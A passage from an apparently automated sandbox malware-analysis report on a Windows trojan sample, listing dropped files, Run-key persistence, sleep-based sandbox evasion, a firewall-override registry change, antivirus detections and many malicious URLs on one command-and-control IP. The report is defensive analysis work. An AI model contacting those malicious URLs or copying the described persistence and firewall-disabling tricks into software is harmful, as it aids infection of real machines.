                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeExecutable created and started: C:\Windows\sysfevcs.exeJump to behavior
                              Source: C:\Windows\sysfevcs.exeFile created: C:\Users\user\AppData\Local\Temp\2350331867.exeJump to dropped file
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeFile created: C:\Windows\sysfevcs.exeJump to dropped file
                              Source: C:\Windows\sysfevcs.exeFile created: C:\Users\user\AppData\Local\Temp\2676917645.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeFile created: C:\Users\user\sysfevcs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeFile created: C:\Windows\sysfevcs.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeFile created: C:\Users\user\sysfevcs.exeJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeFile created: C:\Users\user\sysfevcs.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeFile opened: C:\Users\user\Desktop\l3Qj8QhTYZ.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysfevcs.exeFile opened: C:\Windows\sysfevcs.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysfevcs.exeFile opened: C:\Users\user\AppData\Local\Temp\2350331867.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysfevcs.exeFile opened: C:\Users\user\AppData\Local\Temp\2676917645.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile opened: C:\Users\user\AppData\Local\Temp\2350331867.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeFile opened: C:\Users\user\AppData\Local\Temp\2676917645.exe:Zone.Identifier read attributes | deleteJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-4235
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-4235
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                              Source: C:\Windows\sysfevcs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4236
                              Source: C:\Windows\sysfevcs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4236
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040B2600_2_0040B260
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040B2601_2_0040B260
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040B2602_2_0040B260
                              Source: C:\Windows\sysfevcs.exe TID: 1076Thread sleep time: -900000s >= -30000sJump to behavior
                              Source: C:\Windows\sysfevcs.exe TID: 5460Thread sleep count: 61 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exe TID: 1708Thread sleep time: -2376000000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exe TID: 1264Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exe TID: 1708Thread sleep time: -216000000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeLast function: Thread delayed
                              Source: C:\Windows\sysfevcs.exeThread delayed: delay time: 900000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeThread delayed: delay time: 216000000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeThread delayed: delay time: 216000000Jump to behavior
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeEvaded block: after key decisiongraph_0-4292
                              Source: C:\Windows\sysfevcs.exeEvaded block: after key decisiongraph_2-4239
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-4242
                              Source: C:\Windows\sysfevcs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4244
                              Source: C:\Windows\sysfevcs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-5587
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeAPI coverage: 3.8 %
                              Source: C:\Windows\sysfevcs.exeAPI coverage: 1.3 %
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040B2602_2_0040B260
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040B2600_2_0040B260
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040E820 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_0040E820
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00404CF0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00404BB0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00404CF0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00404BB0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00404CF0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00404BB0
                              Source: C:\Windows\sysfevcs.exeThread delayed: delay time: 900000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeThread delayed: delay time: 216000000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeThread delayed: delay time: 216000000Jump to behavior
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeAPI call chain: ExitProcess graph end nodegraph_0-4248
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeAPI call chain: ExitProcess graph end nodegraph_0-4238
                              Source: C:\Windows\sysfevcs.exeAPI call chain: ExitProcess graph end nodegraph_1-4269
                              Source: C:\Windows\sysfevcs.exeAPI call chain: ExitProcess graph end nodegraph_1-4252
                              Source: C:\Windows\sysfevcs.exeAPI call chain: ExitProcess graph end nodegraph_1-4238
                              Source: C:\Windows\sysfevcs.exeAPI call chain: ExitProcess graph end nodegraph_2-4270
                              Source: C:\Windows\sysfevcs.exeAPI call chain: ExitProcess graph end nodegraph_2-4253
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeAPI call chain: ExitProcess graph end node
                              Source: sysfevcs.exe, 00000001.00000002.485306356.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341785730.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485423655.0000000003004000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00408650 GetProcessHeaps,0_2_00408650
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: GetLocaleInfoA,0_2_0040CE10
                              Source: C:\Windows\sysfevcs.exeCode function: GetLocaleInfoA,1_2_0040CE10
                              Source: C:\Windows\sysfevcs.exeCode function: GetLocaleInfoA,2_2_0040CE10
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeCode function: 12_2_00901490 GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,wsprintfA,12_2_00901490
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeCode function: 12_2_00901490 GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,wsprintfA,12_2_00901490

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\sysfevcs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: l3Qj8QhTYZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 15.2.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000002.518234685.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.260711622.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.507786324.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.262918293.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000000.482216563.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000003.507495356.0000000000566000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.251631749.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000000.505235810.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.279876335.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.485944774.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: l3Qj8QhTYZ.exe PID: 6012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 6120, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 4764, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2676917645.exe PID: 7920, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 2088, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2676917645.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysfevcs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\sysfevcs.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040E820 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_0040E820
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040DA90 CreateEventA,socket,bind,CreateThread,0_2_0040DA90
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040C2A0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040C2A0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040D5C0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_0040D5C0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040E820 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_0040E820
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040DA90 CreateEventA,socket,bind,CreateThread,1_2_0040DA90
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040C2A0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040C2A0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040D5C0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_0040D5C0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040E820 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_0040E820
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040DA90 CreateEventA,socket,bind,CreateThread,2_2_0040DA90
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040C2A0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040C2A0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040D5C0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_0040D5C0
                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts11
                              Native API
                              1
                              Registry Run Keys / Startup Folder
                              1
                              Process Injection
                              231
                              Masquerading
                              11
                              Input Capture
                              2
                              System Time Discovery
                              Remote Services11
                              Input Capture
                              Exfiltration Over Other Network Medium2
                              Encrypted Channel
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                              Registry Run Keys / Startup Folder
                              1
                              Disable or Modify Tools
                              LSASS Memory221
                              Security Software Discovery
                              Remote Desktop Protocol1
                              Archive Collected Data
                              Exfiltration Over Bluetooth1
                              Non-Standard Port
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                              Virtualization/Sandbox Evasion
                              Security Account Manager21
                              Virtualization/Sandbox Evasion
                              SMB/Windows Admin Shares2
                              Clipboard Data
                              Automated Exfiltration4
                              Ingress Tool Transfer
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                              Process Injection
                              NTDS1
                              Remote System Discovery
                              Distributed Component Object ModelInput CaptureScheduled Transfer3
                              Non-Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                              Hidden Files and Directories
                              LSA Secrets1
                              System Network Configuration Discovery
                              SSHKeyloggingData Transfer Size Limits23
                              Application Layer Protocol
                              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
                              System Network Connections Discovery
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                              File and Directory Discovery
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
                              System Information Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 765636 Sample: l3Qj8QhTYZ.exe Startdate: 12/12/2022 Architecture: WINDOWS Score: 100 38 yahoo.com.au 2->38 40 westnet.com.au 2->40 42 58 other IPs or domains 2->42 66 Antivirus detection for URL or domain 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 4 other signatures 2->72 9 l3Qj8QhTYZ.exe 1 1 2->9         started        13 sysfevcs.exe 2->13         started        signatures3 process4 file5 36 C:\Windows\sysfevcs.exe, PE32 9->36 dropped 90 Found evasive API chain (may stop execution after checking mutex) 9->90 92 Contains functionality to check if Internet connection is working 9->92 94 Drops executables to the windows directory (C:\Windows) and starts them 9->94 96 2 other signatures 9->96 15 sysfevcs.exe 7 21 9->15         started        signatures6 process7 dnsIp8 50 185.215.113.66, 49699, 49701, 49704 WHOLESALECONNECTIONSNL Portugal 15->50 52 201.111.237.231 UninetSAdeCVMX Mexico 15->52 54 13 other IPs or domains 15->54 30 C:\Users\user\AppData\...\2676917645.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\...\2350331867.exe, PE32 15->32 dropped 56 Antivirus detection for dropped file 15->56 58 Multi AV Scanner detection for dropped file 15->58 60 Found evasive API chain (may stop execution after checking mutex) 15->60 64 5 other signatures 15->64 20 2676917645.exe 1 1 15->20         started        24 2350331867.exe 17 15->24         started        file9 62 Tries to resolve many domain names, but no domain seems valid 50->62 signatures10 process11 dnsIp12 34 C:\Users\user\sysfevcs.exe, PE32 20->34 dropped 74 Antivirus detection for dropped file 20->74 76 Multi AV Scanner detection for dropped file 20->76 78 Machine Learning detection for dropped file 20->78 88 2 other signatures 20->88 27 sysfevcs.exe 20->27         started        44 yahoo.com.au 24->44 46 waverleyrsl.com.au 24->46 48 550 other IPs or domains 24->48 80 Found evasive API chain (may stop execution after checking mutex) 24->80 82 Contains functionality to determine the online IP of the system 24->82 84 May check the online IP address of the machine 24->84 file13 86 Tries to resolve many domain names, but no domain seems valid 46->86 signatures14 process15 signatures16 98 Antivirus detection for dropped file 27->98 100 Multi AV Scanner detection for dropped file 27->100 102 Machine Learning detection for dropped file 27->102

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              l3Qj8QhTYZ.exe85%ReversingLabsWin32.Trojan.FWDisable
                              l3Qj8QhTYZ.exe61%VirustotalBrowse
                              l3Qj8QhTYZ.exe100%AviraHEUR/AGEN.1237550
                              l3Qj8QhTYZ.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\2676917645.exe100%AviraHEUR/AGEN.1237550
                              C:\Users\user\sysfevcs.exe100%AviraHEUR/AGEN.1237550
                              C:\Windows\sysfevcs.exe100%AviraHEUR/AGEN.1237550
                              C:\Users\user\AppData\Local\Temp\2350331867.exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Temp\2676917645.exe100%Joe Sandbox ML
                              C:\Users\user\sysfevcs.exe100%Joe Sandbox ML
                              C:\Windows\sysfevcs.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\2350331867.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\2676917645.exe85%ReversingLabsWin32.Trojan.FWDisable
                              C:\Users\user\sysfevcs.exe85%ReversingLabsWin32.Trojan.FWDisable
                              C:\Windows\sysfevcs.exe85%ReversingLabsWin32.Trojan.FWDisable
                              SourceDetectionScannerLabelLinkDownload
                              16.0.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              15.2.2676917645.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              0.2.l3Qj8QhTYZ.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              12.0.2350331867.exe.900000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              16.2.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              0.0.l3Qj8QhTYZ.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              2.0.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              15.0.2676917645.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              1.0.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              12.2.2350331867.exe.900000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              2.2.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              1.2.sysfevcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                              SourceDetectionScannerLabelLink
                              mx.ozonline.com.au0%VirustotalBrowse
                              mx1.eftel.com0%VirustotalBrowse
                              mail.ains.net.au0%VirustotalBrowse
                              mx2.email-hosting.net.au0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              http://185.215.113.66/5100%Avira URL Cloudmalware
                              http://185.215.113.66/3100%Avira URL Cloudmalware
                              http://185.215.113.66/5-586C90B09FEF100%Avira URL Cloudmalware
                              http://185.215.113.66/1w100%Avira URL Cloudmalware
                              http://185.215.113.66/pol/n.txt100%Avira URL Cloudmalware
                              http://185.215.113.66/pol/608.txt100%Avira URL Cloudmalware
                              http://185.215.113.66/4100%Avira URL Cloudmalware
                              http://185.215.113.66/4a100%Avira URL Cloudmalware
                              http://185.215.113.66/1j100%Avira URL Cloudmalware
                              http://185.215.113.66/1C100%Avira URL Cloudmalware
                              http://185.215.113.66/3j100%Avira URL Cloudmalware
                              http://185.215.113.66/2N100%Avira URL Cloudmalware
                              http://185.215.113.66/2100%Avira URL Cloudmalware
                              http://185.215.113.66/1Z100%Avira URL Cloudmalware
                              http://185.215.113.66/1k100%Avira URL Cloudmalware
                              http://185.215.113.66/getntbupu100%Avira URL Cloudmalware
                              http://185.215.113.66/pol/http://185.215.113.66/pol/n.txt100%Avira URL Cloudmalware
                              http://185.215.113.66/2W100%Avira URL Cloudmalware
                              http://185.215.113.66/4X100%Avira URL Cloudmalware
                              http://185.215.113.66/1100%Avira URL Cloudmalware
                              http://185.215.113.66/getntbup100%Avira URL Cloudmalware
                              http://185.215.113.66/getntbup:100%Avira URL Cloudmalware
                              http://185.215.113.66/ED-4BF2-83AB-37B7B86E58B0100%Avira URL Cloudmalware
                              http://185.215.113.66/getntbupr100%Avira URL Cloudmalware
                              http://185.215.113.66/3a100%Avira URL Cloudmalware
                              http://185.215.113.66/5j100%Avira URL Cloudmalware
                              http://185.215.113.66/4LMEM0100%Avira URL Cloudmalware
                              http://185.215.113.66/2E100%Avira URL Cloudmalware
                              http://185.215.113.66/4Po100%Avira URL Cloudmalware
                              http://ica.215.113.66/10%Avira URL Cloudsafe
                              http://185.215.113.66/1N100%Avira URL Cloudmalware
                              http://185.215.113.66/4ystem32100%Avira URL Cloudmalware
                              http://185.215.113.66/4/100%Avira URL Cloudmalware
                              http://185.215.113.66/pol/100%Avira URL Cloudmalware
                              http://185.215.113.66/3ystem32100%Avira URL Cloudmalware
                              http://185.215.113.66/5858874sysfevcs.exeWindows100%Avira URL Cloudmalware
                              http://185.215.113.66/43100%Avira URL Cloudmalware
                              http://185.215.113.66/4s100%Avira URL Cloudmalware
                              http://185.215.113.66/2t100%Avira URL Cloudmalware
                              http://185.215.113.66/47100%Avira URL Cloudmalware
                              http://185.215.113.66/100%Avira URL Cloudmalware
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              westpac-com-au.mail.protection.outlook.com
                              104.47.71.202
                              truefalse
                                high
                                tempofoods-com-au.mail.protection.outlook.com
                                104.47.71.138
                                truefalse
                                  high
                                  amp-com-au.mail.protection.outlook.com
                                  104.47.71.202
                                  truefalse
                                    high
                                    hockingstuart-com-au.mail.protection.outlook.com
                                    104.47.71.202
                                    truefalse
                                      high
                                      nac-nsw-edu-au.mail.protection.outlook.com
                                      104.47.71.138
                                      truefalse
                                        high
                                        mx.ozonline.com.au
                                        203.4.248.45
                                        truefalseunknown
                                        mx1.eftel.com
                                        203.134.71.81
                                        truefalseunknown
                                        alt2.aspmx.l.google.com
                                        74.125.200.27
                                        truefalse
                                          high
                                          mail.ains.net.au
                                          202.126.100.156
                                          truefalseunknown
                                          mx2.email-hosting.net.au
                                          43.250.142.232
                                          truefalseunknown
                                          mail.actraders.com.au
                                          139.99.135.94
                                          truefalse
                                            unknown
                                            mail2.optusnet.com.au
                                            211.29.132.250
                                            truefalse
                                              unknown
                                              nwqphc.com.au
                                              188.165.138.210
                                              truefalse
                                                unknown
                                                marchesepartners-com-au.mail.protection.outlook.com
                                                104.47.71.202
                                                truefalse
                                                  high
                                                  cluster5a.us.messagelabs.com
                                                  52.207.128.88
                                                  truefalse
                                                    high
                                                    hallie.shoalhaven.net.au
                                                    203.17.235.1
                                                    truefalse
                                                      unknown
                                                      uqconnect-edu-au.mail.protection.outlook.com
                                                      104.47.71.202
                                                      truefalse
                                                        high
                                                        mx01.mail.icloud.com
                                                        17.57.156.24
                                                        truefalse
                                                          high
                                                          healforlife-com-au.mail.protection.outlook.com
                                                          104.47.71.202
                                                          truefalse
                                                            high
                                                            m-obemv-vic-sun-mta01.alphawest.com.au
                                                            125.63.146.250
                                                            truefalse
                                                              unknown
                                                              filter1.guardi-1.mailguard.com.au
                                                              54.66.10.162
                                                              truefalse
                                                                unknown
                                                                wopr.ci.com.au
                                                                192.65.182.4
                                                                truefalse
                                                                  unknown
                                                                  adventureworld-com-au.mail.protection.outlook.com
                                                                  104.47.66.10
                                                                  truefalse
                                                                    high
                                                                    edumail-vic-gov-au.mail.protection.outlook.com
                                                                    104.47.71.138
                                                                    truefalse
                                                                      high
                                                                      telethonkids.in.tmes-anz.trendmicro.com
